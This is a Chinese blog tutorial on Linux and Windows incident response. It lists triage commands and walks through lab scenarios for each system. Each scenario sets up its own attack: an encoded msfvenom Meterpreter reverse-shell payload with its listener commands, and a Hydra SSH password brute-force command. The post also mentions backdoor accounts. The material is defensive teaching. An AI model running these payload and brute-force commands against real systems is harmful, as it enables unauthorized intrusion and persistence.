应急响应：Linux&Windows实战排查

最新推荐文章于 2024-11-09 00:29:36 发布

闰土炖猹

最新推荐文章于 2024-11-09 00:29:36 发布

阅读量1k

点赞数 35

文章标签：安全应急响应

本文链接：https://blog.csdn.net/2301_80116443/article/details/142766265

版权

应急响应

介绍：

络安全应急响应是指团队或组织为了在网络安全事件发生时能够及时准确地做出反应和应对而建立的一套制度和流程，旨在降低网络安全事件所造成的损失并迅速恢复受影响的系统和服务‌。

网络安全应急响应的核心内容包括：预警评估，通过挖掘威胁情报和漏洞信息进行风险评估和预警；事件响应，组织专业人员进行快速响应，包括定位、分析和修复；事后总结，明确问题原因和解决方案，并进行风险评估；技术支持，提供网络安全技术支持以提高网络的安全性；培训教育，提升组织内部员工的安全意识和应急响应能力

应急流程：

‌准备阶段‌：建立应急响应团队，制定应急响应计划，并进行培训和演练，确保团队熟悉流程和职责。同时，准备必要的工具和资源‌。
‌识别阶段‌：通过监控和检测系统，快速识别和确认网络安全事件，评估其严重性和影响范围‌。
‌抑制阶段‌：采取措施控制和限制安全事件的传播和影响，如隔离受感染系统、阻断恶意活动等‌。
‌根除阶段‌：深入分析事件起因，清除恶意软件和工具，修补被利用的漏洞‌。
‌恢复阶段‌：将受影响的系统恢复到正常运行状态，确保业务连续性‌。
‌事后分析阶段‌：对事件进行全面回顾和分析，总结经验教训，改进应急响应计划‌

抑制阶段：

‌抑制阶段主要针对检测阶段发现的攻击特征采取有针对性的安全补救工作，以防止攻击进一步加深和扩大‌。具体措施包括：

‌控制、阻断、转移安全攻击‌：针对攻击利用的端口、服务、攻击源、系统漏洞等进行抑制，扼制攻击的影响范围和程度‌1。
‌风险考虑‌：在实施抑制措施时，必须充分考虑可能对正常业务造成的影响，如拔掉网线可能导致业务中断，因此在采取抑制措施时需权衡利弊‌1。
‌制定抑制方案‌：确定抑制方案，并获得认可后实施，同时对抑制效果进行判定，确保抑制措施的有效性‌

对于Linux，一些常见的排查命令：

查找2分钟内修改过的文件:

find / -mmin -2

find / -mmin -2 | grep etc

查看修改时间：ls --full-time passwd

查看hash来判断是否被修改：md5sum passwd 如果被修改这个hash值会变，那么我们可以监控hash值的变化来进行告警，可以写一个监控脚本

查看DNS信息：cat /etc/resolv.conf

查看路由信息：route -n

查看进程：ps -aux

查看端口：netstat -ano

查看环境变量：echo $PATH

日志信息位置：/var/log

查看CPU内存信息：top

查看正在监听的端口： netstat -ntplu

查看开机启动的服务：systemctl list-unit-files

查看服务的状态：systemctl status 服务名

对于Windows，常见的排查命令：

查看所有网卡信息：ipconfig/all | more

查看目录hash信息：certutil.exe -hashfile .\文件名

查看用户：net user

查看进程：netstat -ano

查看环境变量：path

除此命令之外，还可以查看：

1.注册表是否有隐藏账号

2.查看账户是否异常

3.查看日志，分析登录的IP

4.查看开机启动服务，计划任务等

5.查看一下进程号和端口号

接下来是关于Windows和Linux的简单实战排查

Windows应急（一）

环境准备：

Linux先生成木马：

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.11.130 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/muma.exe

开启Apache服务，使Windows能够访问下载

systemctl start apache2

打开Windows，下载恶意木马

注意关闭防火墙

打开Linux的监听：

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.11.130
set lport 9999

点击Windows下载的木马使他上线

成功上线：

排查思路：

1.先查看是否有异常的连接

netstat -ano

这里可以直接看到异常的连接

2.发现异常查看一下PID是7684，那么直接打开任务管理器找到这个进程，直接杀掉

杀掉以后，看一下我们的攻击机器

果然，连接断开

3.除此之外，我们还可以查看一下计划任务，查看一下是否有异常

Windows应急（二）

环境准备：

开启靶机的3389端口

攻击机远程桌面并且连接，创建一个新的用户

排查：

1.查看是否有异常用户

net user

2.这里可能有隐藏账户，打开注册表看一下

这里可以看到隐藏账户

计算机管理也可以看用户信息

3.查看一下日志，登录信息

4.查看服务信息，是否有异常

Linux应急

环境准备：

确定目标服务器

使用hydra进行爆破密码

hydra -s 22 -v -l root -P 字典 地址 ssh

这里爆破成功，直接登录，因为kali出了点问题，这里我有centos7登录

登录成功

创建一个新账户

这里创建的普通用户，可以留一个提取后门，下次以普通用户登录进去，直接提权到root权限，

这里还可以进行反弹shell，计划任务、服务等等操作

因为这里只是演示，不再操作

排查：

1.先查看CPU占有率

top

有的时候会有挖矿木马占用的CPU较高

2.查看开机启动服务：

systemctl list-unit-files

查看一下是否有异常

3.查看定时任务：

crontab -l

4.查看日志，看有哪些登录信息

cd /var/log
last

这里就可以看到异常登录

5.查看账户信息

cat /etc/passwd

发现了刚才创建的用户，直接删除

6.我们还可以查看passwd的MD5值是否变化来排查是否异常

cd /etc
md5sum passwd

这里可以写一个监控MD5的脚本，当MD5值变化时，就会及时告警

防御

‌强化预防措施‌：安装杀毒软件，定期扫描系统、查杀病毒；及时更新病毒库和系统补丁；不随意打开不明网页链接或下载来历不明的软件。‌
‌提高密码安全‌：账户和密码尽量不要相同，定期修改密码，使用复杂且独特的密码组合。‌
‌保护个人信息‌：不轻易透露个人信息，特别是银行卡、密码等敏感信息；处理快递单等含个人信息的物品时要先抹掉个人信息